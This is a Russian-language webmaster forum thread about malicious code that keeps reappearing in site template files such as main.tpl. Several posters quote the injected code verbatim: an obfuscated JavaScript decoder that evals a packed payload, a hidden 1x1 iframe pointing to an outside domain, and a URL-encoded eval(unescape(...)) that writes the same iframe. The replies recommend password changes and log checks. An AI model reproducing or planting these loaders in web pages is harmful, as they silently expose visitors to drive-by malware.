Очередная фишка хакеров?

[BOOTKiller 0]

[quote]<script language=JavaScript>function rubban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,40,56,62,47,9,45,44,0,8,0,0,0,0,0,0,11,18,53,58,52,16,49,20,35,5,59,51,27

,3,41,55,32,54,28,37,4,10,1,23,42,50,39,0,0,0,0,21,0,6,12,57,60,30,34,24,61,13,48

,7,26,17,33,46,25,36,19,29,38,22,15,14,31,2,43);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(173^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}rubban('lrdj5@7QMCsQbZiQeMNfN@dj9z1S5@7KgMbYMZhPl0iFpHRnUa5F@0iK8HRHMKbj9McZwKbYvO1O

xJbqvuRQpOhSyU1Zsr7Yev9FM47jyt6PAX1nPKRQIv2OyHhj5W92bZsFM3iKMZ7j8W9nkYcZRfcZTl1fx

CbK907faX2HiXiF5ZsFE3pt_QgF9r7YIZiqpApHeZiBVHbqvtbFeOsjbrhSM@dj902qmU9F@0iK8HdqUA

9')</script><!-- 208.83.61.18 -->[/quote]

такая штучка обнаружилась.. .вируса или вредоносного объекта не нашлось...

может кто скажет чего по поводу кода интересного?

[Greeze 0]

нет повода для беспокойства.

js скрипты не должны работать при использовании в таком виде.

[celsoft 6 076]

BOOTKiller,

В смысле обнаружилась? Где вы обнаружили этот код?

[BOOTKiller 0]

в индексовом файле и main.tpl

[celsoft 6 076]

в индексовом файле и main.tpl

Меняйте все пароли и обязательно по FTP, проверяйте компютеры антивирусом и не храните пароли от FTP в FTP менеджерах, их лучше всегда вводить вручную при входе по FTP. Тот же случай что и с iframe только код другой.

[Greeze 0]

в индексовом файле и main.tpl

непонял юмора..

зачем же туда втыкать

.

[BOOTKiller 0]

Ну это я промазал чуток....

[IMPERATOR 1]

А мне постоянно вот эту дрянь пишут

<iframe src=http://oole.biz/index.php width=1 height=1 style="display:none"></iframe>

Заманали уже,пароли менял раз 10,помогает на 5 дней не больше! Запретил в чмодах изменять main.tpl ,так эти говнюки сюда навтыкали: ./templates/Default/vote.tpl ./templates/Default/speedbar.tpl ./templates/Default/comments.tpl ./templates/Default/feedback.tpl ./templates/Default/search.tpl ./templates/Default/navigation.tpl ./templates/Default/userinfo.tpl ./templates/Default/addnews.tpl ./templates/Default/stats.tpl ./templates/Default/fullstory.tpl ./templates/Default/addcomments.tpl А неделю назад вот эту дрянь постоянно прописывали

<script type="text/javascript">

eval(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6F%6F%6C%65%2E%62%69%7A%2F%69%6E%64%65%78%2E%70%68%70%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));

</script>

Уже задрали! Не знаю как от них защищатся!?

[JaMaster 0]

IMPERATOR, ссылку на сайт?

[IMPERATOR 1]

Клиенту ссылку на сайт? Зачем? Может вы и есть хакер который здесь тусит и убирает конкурентов?

[WMDrakon 20]

IMPERATOR,

не советую так неуважительно разговаривать.

А правила надо соблюдать, так что прошу ссылку напишите, пожалуйста.

[mitriy 5]

если менял все пароли и 100% уверен что нет никаких вирусов на компе (nod или касперский молчат) то надо менять хостера. больше никак не добраться до ftp чужому.

а вообще посмотри дату измения файла и в логах поищи с какого айпи обращение к нему было. я так помню года 3 назад valuehost запалил. админ у них баловался.

в любом случае, если айпишник одинаковый все время меняет тебе файлы - можешь его забанить через хостера.

[omvitamin 0]

Ну вы даёте.. Вам айфреймы в индексы вставляют, а вы на систему валите что ли? Кроме как с помощью украденных паролей, это больше никак делать не будут. Так что проверяйте файлы, меняйте пароли и сканируйте свою машину на наличие дряни!

[IMPERATOR 1]

Ну вообщето адрес моего сайта стоит в моих личных данных! Ну могу дать http://www.imperia-of-hentai.ru/index.php

Стоит Кис 7,0 ,пароли менял уже много раз! По логам попробую вычислить,но если человек использует прогу которая прячет или выдаёт левый айпишник не уверен

что это поможет!

[Danila 8]

Закройтесь .ftpaccess'ом мне помогло.

[IMPERATOR 1]

Можно поподробней,что за зверь? ftpaccess?

[JaMaster 0]

а точно не NULL версия??? хотя я не вижу в файлах!!!!!

[WMDrakon 20]

JaMaster,

нет, не null. 100%.

Просто null или не null правила надо соблюдать.

[IMPERATOR 1]

Не знаю что такое NULL версия,оплатил пожизненую лицензию,как положено скачал и установил!

На днях до 6,7 апгрейжу!

Просто надойдает проверять антивирусом,а потом чистить за этими засранцами!

[komnervov 0]

У меня такая-же хрень на сайте с движком 5.3 кажется. Удаляю, через неделю снова висит, после последнего удаления дней 10 нет правда, сатом не занимаюсь давно, но случайно касперский завизжал кгда на него попал.

[seonet 0]

Не храните пароли в ftp-менеджерах! У нас такая же ситуация была, стали прописывать при коннекте ручками стало все нормально.

[error2k 2]

Хостер лопух скорее всего.

[ShVad 2]

А неделю назад вот эту дрянь постоянно прописывали

Код

<script type="text/javascript">

eval(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6F%6F%6C%65%2E%62%69%7A%2F%69%6E%64%65%78%2E%70%68%70%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));

</script>

Тоже самое, но в unit.php. Сменил пароль появился на следующий день немного другой код.

[IMPERATOR 1]

Сегодня сменил фтп пароли и никуда его ещё не вводил,всё равно опять вписали!

Кто нибудь может сказать что сделать?

[lifestar 18]

Хостер лопух скорее всего.